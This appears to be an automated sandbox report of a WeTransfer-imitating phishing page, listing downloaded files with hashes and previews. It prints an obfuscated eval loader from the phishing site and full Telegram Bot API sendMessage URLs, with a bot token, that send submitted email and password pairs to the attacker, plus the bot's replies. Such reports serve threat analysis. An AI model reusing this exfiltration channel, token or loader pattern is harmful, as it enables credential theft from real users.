                      SHA-256:C61E2E1347B9ACA3D8F0C9725490470651A1F6C02841FF71F90305EA391CA6D2
                      SHA-512:2B32A82A8E7E0A1F6203A04C3E7DDAE6AC3A4438B2309DC04EA112D862839902DD47D2E4A569BCB6F91E359B1F8197F3A179A206A458881A66E89860F96D526E
                      Malicious:false
                      Reputation:unknown
                      URL:https://challenges.cloudflare.com/turnstile/v0/b/a6e12e96a2d5/api.js?onload=sLNwD4&render=explicit
                      Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):390
                      Entropy (8bit):4.7920055787698566
                      Encrypted:false
                      SSDEEP:
                      MD5:F66A35CFC4582B52CC673CE25E554500
                      SHA1:0803FC2C64219116CE577E6C6C918AF492498B4B
                      SHA-256:2271DD89EC0BD2F8C0EDD881373D5EE58B42B3D47C120DEB223DA0646D4A9068
                      SHA-512:46166544E569B313E3B0567C3261CD17A876F3762CE3D82F4ECE34EEC0E36E8AB3E2E18BEAD97E9B9A94F3DE717DB6A289DA7F75D73A602A274A18489CDBDDBE
                      Malicious:false
                      Reputation:unknown
                      Preview:{"ok":true,"result":{"message_id":1760,"from":{"id":7499623592,"is_bot":true,"first_name":"wetranchocobot","username":"wetranchocobot_bot"},"chat":{"id":1411469413,"first_name":"Pita","username":"gonpita10","type":"private"},"date":1733219316,"text":"\ud83c\udf96\ufe0f\ud83d\udcb0 - tutuutututututu@iledefrance.fr:tututututututututut","entities":[{"offset":8,"length":30,"type":"email"}]}}
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (8802), with no line terminators
                      Category:downloaded
                      Size (bytes):8802
                      Entropy (8bit):5.746357802872947
                      Encrypted:false
                      SSDEEP:
                      MD5:5EBB46DC26CB1BE3292E653C5ED82184
                      SHA1:CB14C1A0260E5FD5C69E8DB94C39E42E6FE59A1F
                      SHA-256:18B891BB4CBD0FFF36BD9D90D026E2630AA5F22932354B8663D2D0CFEBB89636
                      SHA-512:6608C1DBA5ACAD9D975CC5BF638F5E1E4B428FA915DC3C8BCF372A26B03A763FABAB9E24B775760479E9F3823D1CA66F95E1C3DA09CDB4573091229AC7295DF1
                      Malicious:false
                      Reputation:unknown
                      URL:https://connexion-espacesclients.support/cdn-cgi/challenge-platform/h/b/scripts/jsd/a6e12e96a2d5/main.js?
                      Preview:window._cf_chl_opt={cFPWv:'b'};~function(X,h,i,j,k,o,s,B,D){X=b,function(d,e,W,f,g){for(W=b,f=d();!![];)try{if(g=-parseInt(W(578))/1+parseInt(W(579))/2*(parseInt(W(611))/3)+parseInt(W(621))/4+parseInt(W(615))/5*(parseInt(W(608))/6)+-parseInt(W(518))/7*(-parseInt(W(590))/8)+parseInt(W(523))/9+parseInt(W(519))/10*(-parseInt(W(501))/11),e===g)break;else f.push(f.shift())}catch(F){f.push(f.shift())}}(a,217544),h=this||self,i=h[X(584)],j={},j[X(600)]='o',j[X(564)]='s',j[X(619)]='u',j[X(512)]='z',j[X(553)]='n',j[X(588)]='I',j[X(541)]='b',k=j,h[X(620)]=function(g,F,G,H,a2,J,K,L,M,N,O){if(a2=X,null===F||void 0===F)return H;for(J=n(F),g[a2(550)][a2(595)]&&(J=J[a2(598)](g[a2(550)][a2(595)](F))),J=g[a2(594)][a2(592)]&&g[a2(515)]?g[a2(594)][a2(592)](new g[(a2(515))](J)):function(P,a3,Q){for(a3=a2,P[a3(545)](),Q=0;Q<P[a3(527)];P[Q+1]===P[Q]?P[a3(582)](Q+1,1):Q+=1);return P}(J),K='nAsAaAb'.split('A'),K=K[a2(558)][a2(497)](K),L=0;L<J[a2(527)];M=J[L],N=m(g,F,M),K(N)?(O=N==='s'&&!g[a2(560)](F[M]),a2(50
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (65536), with no line terminators
                      Category:downloaded
                      Size (bytes):68252
                      Entropy (8bit):5.327149888025743
                      Encrypted:false
                      SSDEEP:
                      MD5:9680A0DA9C0EB25F705242911627D328
                      SHA1:8B0367F7F109D79588DBAFB206DA2668B0EEB34B
                      SHA-256:CACEED50BF88EF12DF9AA95B810284EC7F3CB623ADD20ECACB51CC98BB9D7578
                      SHA-512:B619CEBB09374555FFC3EF8BE1C72ED3EB87AE427B954B82AC5434B004370456B6FEDE1C5083139A23C80B5F28796E0A706D3DF32E49085B80CC1066740BDAF7
                      Malicious:false
                      Reputation:unknown
                      URL:https://cdn.wetransfer.com/_next/static/chunks/pages/_app-d88c4a36bc6d75ca.js
                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2888],{57632:function(e,t,n){"use strict";n.d(t,{Z:function(){return c}});var r={randomUUID:"undefined"!==typeof crypto&&crypto.randomUUID&&crypto.randomUUID.bind(crypto)};let o;const i=new Uint8Array(16);function u(){if(!o&&(o="undefined"!==typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto),!o))throw new Error("crypto.getRandomValues() not supported. See https://github.com/uuidjs/uuid#getrandomvalues-not-supported");return o(i)}const a=[];for(let l=0;l<256;++l)a.push((l+256).toString(16).slice(1));function s(e,t=0){return(a[e[t+0]]+a[e[t+1]]+a[e[t+2]]+a[e[t+3]]+"-"+a[e[t+4]]+a[e[t+5]]+"-"+a[e[t+6]]+a[e[t+7]]+"-"+a[e[t+8]]+a[e[t+9]]+"-"+a[e[t+10]]+a[e[t+11]]+a[e[t+12]]+a[e[t+13]]+a[e[t+14]]+a[e[t+15]]).toLowerCase()}var c=function(e,t,n){if(r.randomUUID&&!t&&!e)return r.randomUUID();const o=(e=e||{}).random||(e.rng||u)();if(o[6]=15&o[6]|64,o[8]=63&o[8]|128,t){n=n||0;for(let e=0;e<16;++e)t[n+e]=o[e];return
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                      Category:dropped
                      Size (bytes):61
                      Entropy (8bit):3.990210155325004
                      Encrypted:false
                      SSDEEP:
                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                      Malicious:false
                      Reputation:unknown
                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (65536), with no line terminators
                      Category:downloaded
                      Size (bytes):140966
                      Entropy (8bit):5.265481962313702
                      Encrypted:false
                      SSDEEP:
                      MD5:324CEBFC999C680645874F5FF4BFFA03
                      SHA1:4ADD84DA7D8B03E756CBAEA8A3ED7BC11A5BCAFB
                      SHA-256:94FC3FEC64F05122551EB50231B245FECC8CCF775383A841DBFE4E468E51C84E
                      SHA-512:517E20135E58A02CABF36D182A1B7F9112BFEF76EC303EDE76E580985E49A130D11D4CD7FA8E2C1B6282304F0965178483EE5F112B5D668C2B258CBF7163A580
                      Malicious:false
                      Reputation:unknown
                      URL:https://cdn.wetransfer.com/_next/static/chunks/framework-5db9cf64c9dbe2fa.js
                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{52967:function(e,n,t){var r=t(2784),l=t(14616);function a(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var o=new Set,u={};function i(e,n){s(e,n),s(e+"Capture",n)}function s(e,n){for(u[e]=n,e=0;e<n.length;e++)o.add(n[e])}var c=!("undefined"===typeof window||"undefined"===typeof window.document||"undefined"===typeof window.document.createElement),f=Object.prototype.hasOwnProperty,d=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7F
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text, with very long lines (5953)
                      Category:downloaded
                      Size (bytes):7387
                      Entropy (8bit):5.688924248924174
                      Encrypted:false
                      SSDEEP:
                      MD5:FD5600DA9502A1B854733BA7D372064F
                      SHA1:8ADB511B5DB6CC55B361C080EA2D65926A830B8A
                      SHA-256:496EC40AC38AC270D65257FDC71F6EEEDF5358634B8446ADFCC5CB98B77017A0
                      SHA-512:5A7CF6CCD1A2D88F2F343048E09A992CAD617B88619763CCAC2138ADB45DCE19D39852B84CC7ECF6CC60B7F468B97DFEF289FB29303E9211D3D5407308BA1429
                      Malicious:false
                      Reputation:unknown
                      URL:https://connexion-espacesclients.support/gkm/
                      Preview:<!DOCTYPE html>.<html>.<head>.<meta charset="utf-8" />.<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />.<meta name="robots" content="noindex, nofollow" />. Start: Ad code and script tags for header of page -->. End: Ad code and script tags for header of page -->.<script type="text/javascript" charset="utf-8" data-cfasync="false">eval(decodeURIComponent(escape(window.atob('KGZ1bmN0aW9uKCl7CiAgICAgICAgdmFyIGEgPSBmdW5jdGlvbigpIHt0cnl7cmV0dXJuICEhd2luZG93LmFkZEV2ZW50TGlzdGVuZXJ9IGNhdGNoKGUpIHtyZXR1cm4gITF9IH0sCiAgICAgICAgYiA9IGZ1bmN0aW9uKGIsIGMpIHthKCkgPyBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCJET01Db250ZW50TG9hZGVkIiwgYiwgYykgOiBkb2N1bWVudC5hdHRhY2hFdmVudCgib25yZWFkeXN0YXRlY2hhbmdlIiwgYil9OwogICAgICAgIGIoZnVuY3Rpb24oKXsKICAgICAgICAgICAgICAgICAgICAgICAgdmFyIG5vdyA9IG5ldyBEYXRlKCk7CiAgICAgICAgICAgICAgICAgICAgICAgIHZ
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with no line terminators
                      Category:downloaded
                      Size (bytes):28
                      Entropy (8bit):4.110577243331642
                      Encrypted:false
                      SSDEEP:
                      MD5:CACD04FB6ADD49B56B840AD313187806
                      SHA1:5C659F8127A5D4AFC77973894A71554B474DADC7
                      SHA-256:B657931ADAEC4F8DEBD30E58B0EF04AF5EECA1ED7A866E4D7AB30954FD832493
                      SHA-512:2D5A1CFC7BCD10928C85A7DD1A6E28C37045C352A56FF2719CEFD175D9F24A60BC3E0948F642B0D0ABB4F1F3E8BF492DB6C2D3A6D540126F6148AC9E997354E3
                      Malicious:false
                      Reputation:unknown
                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwkeXrndqANg4BIFDWclhfMSBQ1vBsgP?alt=proto
                      Preview:ChIKBw1nJYXzGgAKBw1vBsgPGgA=
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (52853)
                      Category:dropped
                      Size (bytes):407279
                      Entropy (8bit):5.474566796208052
                      Encrypted:false
                      SSDEEP:
                      MD5:5B52C03627370529CB3D42054517307D
                      SHA1:BE99CC0B909CBF31100DD09883C9E4C9D30082AD
                      SHA-256:9E21F0E917F4B92DA9139FFC87E135F0D236E28D6EAD92F901CDF5FE7F61B4A1
                      SHA-512:B7586DD68CFFBC6F2157B69D4BDE896EF971CE5E779FC884B720FCC1481E8EDC4A115D73DED1EA69B5936A79E5E7908D74604B4670D318EC2CE1E05FEB8CF49B
                      Malicious:false
                      Reputation:unknown
                      Preview:(()=>{var qv=Object.create;var Hi=Object.defineProperty;var $v=Object.getOwnPropertyDescriptor;var Lv=Object.getOwnPropertyNames;var Mv=Object.getPrototypeOf,Nv=Object.prototype.hasOwnProperty;var df=r=>Hi(r,"__esModule",{value:!0});var hf=r=>{if(typeof require!="undefined")return require(r);throw new Error('Dynamic require of "'+r+'" is not supported')};var P=(r,e)=>()=>(r&&(e=r(r=0)),e);var x=(r,e)=>()=>(e||r((e={exports:{}}).exports,e),e.exports),Ge=(r,e)=>{df(r);for(var t in e)Hi(r,t,{get:e[t],enumerable:!0})},Bv=(r,e,t)=>{if(e&&typeof e=="object"||typeof e=="function")for(let i of Lv(e))!Nv.call(r,i)&&i!=="default"&&Hi(r,i,{get:()=>e[i],enumerable:!(t=$v(e,i))||t.enumerable});return r},pe=r=>Bv(df(Hi(r!=null?qv(Mv(r)):{},"default",r&&r.__esModule&&"default"in r?{get:()=>r.default,enumerable:!0}:{value:r,enumerable:!0})),r);var m,u=P(()=>{m={platform:"",env:{},versions:{node:"14.17.6"}}});var Fv,be,ft=P(()=>{u();Fv=0,be={readFileSync:r=>self[r]||"",statSync:()=>({mtimeMs:Fv++}),pro
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:JSON data
                      Category:downloaded
                      Size (bytes):390
                      Entropy (8bit):4.793833895493438
                      Encrypted:false
                      SSDEEP:
                      MD5:2C211F0473C574A3EDB70E18E84588BD
                      SHA1:D1CB1DAB39D9EDA1AC17122E16F99EE4206555B7
                      SHA-256:365957A9448E4A2E8EA76D275E0E66116DDEA7F6EEB478BA3138DDF75A3C39F6
                      SHA-512:88A19792C81687B584267EBD8513AC3C2EEBDBC345AC9F625688993E3654498FE97DB2356FF5D9A53FA662281FCC22658DD7F87771277D721065C745B03B77B5
                      Malicious:false
                      Reputation:unknown
                      URL:https://api.telegram.org/bot7499623592:AAG4sRR7YzmOAFkZFFwiAbBsnnHB-lXYLSk/sendMessage?chat_id=1411469413&text=%F0%9F%8E%96%EF%B8%8F%F0%9F%92%B0%20-%20tutuutututututu%40iledefrance.fr%3Atututututututututut
                      Preview:{"ok":true,"result":{"message_id":1759,"from":{"id":7499623592,"is_bot":true,"first_name":"wetranchocobot","username":"wetranchocobot_bot"},"chat":{"id":1411469413,"first_name":"Pita","username":"gonpita10","type":"private"},"date":1733219314,"text":"\ud83c\udf96\ufe0f\ud83d\udcb0 - tutuutututututu@iledefrance.fr:tututututututututut","entities":[{"offset":8,"length":30,"type":"email"}]}}
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:Unicode text, UTF-8 text, with very long lines (65533), with no line terminators
                      Category:downloaded
                      Size (bytes):369700
                      Entropy (8bit):5.134379686734492
                      Encrypted:false
                      SSDEEP:
                      MD5:33F5706AA2D807612A57E32386473D2D
                      SHA1:3D57348F1B199337F46D0BDFEFDE4D542956B9D6
                      SHA-256:F5A3F57ACC79DDE072E54C68DF02E6A63D038BFEE32338DAED80A4EBA0DD17D2
                      SHA-512:00E9337F1032AB77FDDC1F67D461F20FAA4D79AE319F991CE4484FD22A79674C8FDCCE8D499DDFF810FBEF57442B13B6303C9ECABDDE2B2F329D20841A0E601E
                      Malicious:false
                      Reputation:unknown
                      URL:https://cdn.wetransfer.com/_next/static/css/058f98705ce4a650.css
                      Preview:@font-face{font-family:Actief Grotesque;font-weight:400;font-style:normal;font-display:swap;src:local("Actief Grotesque"),url(/_next/static/media/ActiefGrotesque-Regular.f4e76979.woff2) format("woff2"),url(/_next/static/media/ActiefGrotesque-Regular.1f5abb93.woff) format("woff")}@font-face{font-family:Actief Grotesque;font-weight:500;font-style:normal;font-display:swap;src:local("Actief Grotesque"),url(/_next/static/media/ActiefGrotesque-Medium.1acd899d.woff2) format("woff2"),url(/_next/static/media/ActiefGrotesque-Medium.cab39769.woff) format("woff")}@font-face{font-family:Actief Grotesque;font-weight:900;font-style:normal;font-display:swap;src:local("Actief Grotesque"),url(/_next/static/media/ActiefGrotesque-Bold.10832e10.woff2) format("woff2"),url(/_next/static/media/ActiefGrotesque-Bold.7ded28bd.woff) format("woff")}@font-face{font-family:GT Super WT;font-weight:400;font-style:normal;font-display:swap;src:local("GT Super WT"),url(/_next/static/media/GTSuperWT-Regular.d1473b9e.woff2
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):395
                      Entropy (8bit):4.781471126159518
                      Encrypted:false
                      SSDEEP:
                      MD5:FD84F0595FA85F5782044083BDB8D81E
                      SHA1:DF5D0BF40DB4BDCCF5B88BCCA9F2343DDCD05FBD
                      SHA-256:B9B36FE6F6616D3C7B86986CE1AB433D520423081087699B793B41DD3D0277EC
                      SHA-512:D1C93B4B207A696EE1BD531720BC52C97E86699CD71403E8B15DC97E20E2EA1C5025F51677BCEA326D6BA882BC1B4EF0B84A0294AF3B5977AC9B6954C72B6C89
                      Malicious:false
                      Reputation:unknown
                      Preview:{"ok":true,"result":{"message_id":1758,"from":{"id":7499623592,"is_bot":true,"first_name":"wetranchocobot","username":"wetranchocobot_bot"},"chat":{"id":1411469413,"first_name":"Pita","username":"gonpita10","type":"private"},"date":1733219309,"text":"\ud83c\udf96\ufe0f\ud83d\udcb0 - tutuutututututu@iledefrance.fr:tutututututututututututu","entities":[{"offset":8,"length":30,"type":"email"}]}}
                      No static file info